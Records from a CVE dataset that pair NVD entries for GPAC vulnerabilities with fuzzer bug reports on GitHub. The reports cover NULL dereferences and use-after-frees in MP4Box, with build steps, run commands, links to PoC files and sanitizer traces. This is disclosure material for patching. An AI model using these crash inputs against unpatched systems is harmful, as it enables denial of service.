System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-gf_isom_dump ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-gf_isom_dump gdb info: ```C Error in bin/MP4Box: free(): invalid next size (fast): 0x00000000009cc600 ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7ffff73447e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7ffff734d37a] /lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7ffff735153c] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ffff72ed830] ======= Memory map: ======== 009c8000-009ec000 rw-p 00000000 00:00 0 [heap] 7ffff0000000-7ffff0021000 rw-p 00000000 00:00 0 7ffff0021000-7ffff4000000 ---p 00000000 00:00 0 7ffff70b7000-7ffff70cd000 r-xp 00000000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff70cd000-7ffff72cc000 ---p 00016000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cc000-7ffff72cd000 rw-p 00015000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cd000-7ffff748d000 r-xp 00000000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff748d000-7ffff768d000 ---p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff768d000-7ffff7691000 r--p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7691000-7ffff7693000 rw-p 001c4000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7693000-7ffff7697000 rw-p 00000000 00:00 0 7ffff7697000-7ffff76b0000 r-xp 00000000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff76b0000-7ffff78af000 ---p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78af000-7ffff78b0000 r--p 00018000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b0000-7ffff78b1000 rw-p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b1000-7ffff79b9000 r-xp 00000000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff79b9000-7ffff7bb8000 ---p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb8000-7ffff7bb9000 r--p 00107000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb9000-7ffff7bba000 rw-p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bba000-7ffff7bd2000 r-xp 00000000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7bd2000-7ffff7dd1000 ---p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd1000-7ffff7dd2000 r--p 00017000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd2000-7ffff7dd3000 rw-p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd3000-7ffff7dd7000 rw-p 00000000 00:00 0 7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7fdf000-7ffff7fe4000 rw-p 00000000 00:00 0 7ffff7ff7000-7ffff7ff8000 rw-p 00000000 00:00 0 7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar] 7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso] 7ffff7ffc000-7ffff7ffd000 r--p 00025000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffd000-7ffff7ffe000 rw-p 00026000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] Program received signal SIGABRT, Aborted. 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1 0x00007ffff730402a in __GI_abort () at abort.c:89 #2 0x00007ffff73447ea in __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0x7ffff745ded8 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 #3 0x00007ffff734d37a in malloc_printerr (ar_ptr=<optimized out>, ptr=<optimized out>, str=0x7ffff745df50 "free(): invalid next size (fast)", action=3) at malloc.c:5006 #4 _int_free (av=<optimized out>, p=<optimized out>, have_lock=0) at malloc.c:3867 #5 0x00007ffff735153c in __GI___libc_free (mem=<optimized out>) at malloc.c:2968 #6 0x0000000000512a7d in gf_isom_box_del () #7 0x0000000000513eae in gf_isom_parse_root_box () #8 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #9 0x000000000051c48c in gf_isom_open_file () #10 0x000000000041c082 in mp4boxMain () #11 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe328, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe318) at ../csu/libc-start.c:291 #12 0x000000000040eba9 in _start () ``` ASAN info: ```C [iso file] Movie fragment but no moov (yet) - possibly broken parsing! [iso file] Box "tenc" (start 8) has 389 extra bytes [iso file] Unknown top-level box type ffff [iso file] Incomplete box ffff - start 532 size 1717986903 [iso file] Incomplete file while reading for dump - aborting parsing  ASAN:SIGSEGV ================================================================= ==26000==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000006a3968 bp 0x61600000ea80 sp 0x7fffffff8080 T0) #0 0x6a3967 in gf_isom_dump isomedia/box_dump.c:133 #1 0x443b9a in dump_isom_xml /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/filedump.c:1930 #2 0x43246d in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4982 #3 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #4 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/box_dump.c:133 gf_isom_dump ==26000==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com)
AddressSanitizer: NULL pointer dereference in gf_isom_dump isomedia/box_dump.c:133
https://api.github.com/repos/gpac/gpac/issues/1331/comments
2
2019-11-09T11:18:44Z
2020-01-08T12:44:45Z
https://github.com/gpac/gpac/issues/1331
520,394,250
1,331
961
CVE-2019-20167
2019-12-31T00:15:12.930
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a NULL pointer dereference in the function senc_Parse() in isomedia/box_code_drm.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1330" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1330" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1330
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-senc_Parse ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-senc_Parse gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x00000000006e1112 in senc_Parse () (gdb) bt #0 0x00000000006e1112 in senc_Parse () #1 0x000000000051b7b2 in gf_isom_parse_movie_boxes.part () #2 0x000000000051c48c in gf_isom_open_file () #3 0x000000000041c082 in mp4boxMain () #4 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe328, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe318) at ../csu/libc-start.c:291 #5 0x000000000040eba9 in _start () ``` ASAN info: ```C [iso file] Unknown box type tfhd in parent moof [iso file] Unknown box type mvhd in parent moof [iso file] Box "tfhd" (start 561) has 68 extra bytes [iso file] Box "tfhd" (start 653) has 594 extra bytes [iso file] extra box tfhd found in traf, deleting [iso file] Box "tfhd" (start 1275) has 68 extra bytes [iso file] Unknown box type VOID in parent moof [iso file] Box "tfhd" (start 1993) has 68 extra bytes [iso file] Box "sgpd" (start 2085) has 373 extra bytes [iso file] Box "traf" is larger than container box [iso file] Box "moof" size 2056 (start 24) invalid (read 2675) [iso file] Movie fragment but no moov (yet) - possibly broken parsing! [isobmf] no moov found, cannot get cenc default info, assuming isEncrypted, IV size 16  ASAN:SIGSEGV ================================================================= ==27812==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000058 (pc 0x000000b0801d bp 0x000000000003 sp 0x7fffffff82c0 T0) #0 0xb0801c in senc_Parse isomedia/box_code_drm.c:1378 #1 0x6dc006 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:407 #2 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #3 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #4 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #5 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/box_code_drm.c:1378 senc_Parse ==27812==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com)
AddressSanitizer: NULL pointer dereference in senc_Parse isomedia/box_code_drm.c:1378
https://api.github.com/repos/gpac/gpac/issues/1330/comments
2
2019-11-09T11:17:12Z
2020-01-08T12:44:20Z
https://github.com/gpac/gpac/issues/1330
520,393,923
1,330
962
CVE-2019-20168
2019-12-31T00:15:13.007
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a use-after-free in the function gf_isom_box_dump_ex() in isomedia/box_funcs.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1333" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1333" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/gpac/gpac/issues/1333
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-gf_isom_box_dump_ex ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-gf_isom_box_dump_ex gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x0000000000505aee in stco_dump () (gdb) bt #0 0x0000000000505aee in stco_dump () #1 0x0000000000514918 in gf_isom_box_dump_ex () #2 0x0000000000502e15 in gf_isom_box_array_dump () #3 0x00000000005149dc in gf_isom_box_dump_done () #4 0x0000000000503a1b in stbl_dump () #5 0x0000000000514918 in gf_isom_box_dump_ex () #6 0x0000000000502e15 in gf_isom_box_array_dump () #7 0x00000000005149dc in gf_isom_box_dump_done () #8 0x000000000050615d in minf_dump () #9 0x0000000000514918 in gf_isom_box_dump_ex () #10 0x0000000000502f10 in gf_isom_dump () #11 0x0000000000425faa in dump_isom_xml () #12 0x000000000041c69a in mp4boxMain () #13 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:291 #14 0x000000000040eba9 in _start () ``` ASAN info: ```C [iso file] Box "mvhd" (start 445) has 8 extra bytes [iso file] Unknown box type tkhd in parent moov [iso file] Unknown box type mdia in parent moov [iso file] Box "UNKN" is larger than container box [iso file] Box "moov" size 256 (start 437) invalid (read 830) [iso file] Read Box type 00000000 (0x00000000) at position 851 has size 0 but is not at root/file level, skipping [iso file] Box "stsd" (start 817) has 120 extra bytes [iso file] Box "stco" (start 1003) has 40 extra bytes ================================================================= ==27857==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000ee50 at pc 0x0000006c6f5d bp 0x7fffffff7db0 sp 0x7fffffff7da0 READ of size 8 at 0x60600000ee50 thread T0 #0 0x6c6f5c in gf_isom_box_dump_ex isomedia/box_funcs.c:1734 #1 0x6a370c in gf_isom_box_dump isomedia/box_dump.c:97 #2 0x6a370c in gf_isom_box_array_dump isomedia/box_dump.c:107 #3 0x6c6faf in gf_isom_box_dump_done isomedia/box_funcs.c:1747 #4 0x6a4f3e in stbl_dump isomedia/box_dump.c:379 #5 0x6c6e7d in gf_isom_box_dump_ex isomedia/box_funcs.c:1738 #6 0x6a370c in gf_isom_box_dump isomedia/box_dump.c:97 #7 0x6a370c in gf_isom_box_array_dump isomedia/box_dump.c:107 #8 0x6c6faf in gf_isom_box_dump_done isomedia/box_funcs.c:1747 #9 0x6aa69a in minf_dump isomedia/box_dump.c:1291 #10 0x6c6e7d in gf_isom_box_dump_ex isomedia/box_funcs.c:1738 #11 0x6a3937 in gf_isom_box_dump isomedia/box_dump.c:97 #12 0x6a3937 in gf_isom_dump isomedia/box_dump.c:139 #13 0x443b9a in dump_isom_xml /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/filedump.c:1930 #14 0x43246d in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4982 #15 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #16 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) 0x60600000ee50 is located 16 bytes inside of 56-byte region [0x60600000ee40,0x60600000ee78) freed by thread T0 here: #0 0x7ffff6f022ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x6c393f in gf_isom_box_del isomedia/box_funcs.c:1508 previously allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xae2b8d in stco_New isomedia/box_code_base.c:5616 SUMMARY: AddressSanitizer: heap-use-after-free isomedia/box_funcs.c:1734 gf_isom_box_dump_ex Shadow bytes around the buggy address: 0x0c0c7fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d90: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0c7fff9da0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fff9db0: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00 =>0x0c0c7fff9dc0: 00 00 00 04 fa fa fa fa fd fd[fd]fd fd fd fd fa 0x0c0c7fff9dd0: fa fa fa fa 00 00 00 00 00 00 00 04 fa fa fa fa 0x0c0c7fff9de0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9df0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==27857==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com)
AddressSanitizer: heap-use-after-free in gf_isom_box_dump_ex isomedia/box_funcs.c:1734
https://api.github.com/repos/gpac/gpac/issues/1333/comments
4
2019-11-09T11:21:05Z
2020-01-16T22:33:39Z
https://github.com/gpac/gpac/issues/1333
520,394,786
1,333
963
CVE-2019-20169
2019-12-31T00:15:13.087
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a use-after-free in the function trak_Read() in isomedia/box_code_base.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1329" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1329" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/gpac/gpac/issues/1329
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-trak_Read ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-trak_Read gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x0000000000505aee in stco_dump () (gdb) bt #0 0x0000000000505aee in stco_dump () #1 0x0000000000514918 in gf_isom_box_dump_ex () #2 0x0000000000502e15 in gf_isom_box_array_dump () #3 0x00000000005149dc in gf_isom_box_dump_done () #4 0x0000000000503a1b in stbl_dump () #5 0x0000000000514918 in gf_isom_box_dump_ex () #6 0x0000000000502e15 in gf_isom_box_array_dump () #7 0x00000000005149dc in gf_isom_box_dump_done () #8 0x000000000050615d in minf_dump () #9 0x0000000000514918 in gf_isom_box_dump_ex () #10 0x0000000000502e15 in gf_isom_box_array_dump () #11 0x00000000005149dc in gf_isom_box_dump_done () #12 0x000000000050644d in mdia_dump () #13 0x0000000000514918 in gf_isom_box_dump_ex () #14 0x0000000000502e15 in gf_isom_box_array_dump () #15 0x00000000005149dc in gf_isom_box_dump_done () #16 0x000000000050435f in trak_dump () #17 0x0000000000514918 in gf_isom_box_dump_ex () #18 0x0000000000502e15 in gf_isom_box_array_dump () #19 0x00000000005149dc in gf_isom_box_dump_done () #20 0x000000000050337a in moov_dump () #21 0x0000000000514918 in gf_isom_box_dump_ex () #22 0x0000000000502f10 in gf_isom_dump () #23 0x0000000000425faa in dump_isom_xml () #24 0x000000000041c69a in mp4boxMain () #25 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe328, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe318) at ../csu/libc-start.c:291 #26 0x000000000040eba9 in _start () ``` ASAN info: ```C ==27939==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000eea0 at pc 0x000000aea883 bp 0x7fffffff7f90 sp 0x7fffffff7f80 READ of size 4 at 0x60600000eea0 thread T0 #0 0xaea882 in trak_Read isomedia/box_code_base.c:7148 #1 0x6c3d6e in gf_isom_box_read isomedia/box_funcs.c:1528 #2 0x6c3d6e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #3 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #4 0xadc064 in moov_Read isomedia/box_code_base.c:3745 #5 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #6 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #7 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #8 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #9 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #10 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #11 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #12 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #13 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) 0x60600000eea0 is located 0 bytes inside of 56-byte region [0x60600000eea0,0x60600000eed8) freed by thread T0 here: #0 0x7ffff6f022ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x6c393f in gf_isom_box_del isomedia/box_funcs.c:1508 previously allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xae2b8d in stco_New isomedia/box_code_base.c:5616 SUMMARY: AddressSanitizer: heap-use-after-free isomedia/box_code_base.c:7148 trak_Read Shadow bytes around the buggy address: 0x0c0c7fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9da0: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c0c7fff9db0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9dc0: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 04 =>0x0c0c7fff9dd0: fa fa fa fa[fd]fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fff9de0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 0x0c0c7fff9df0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==27939==ABORTING ``` 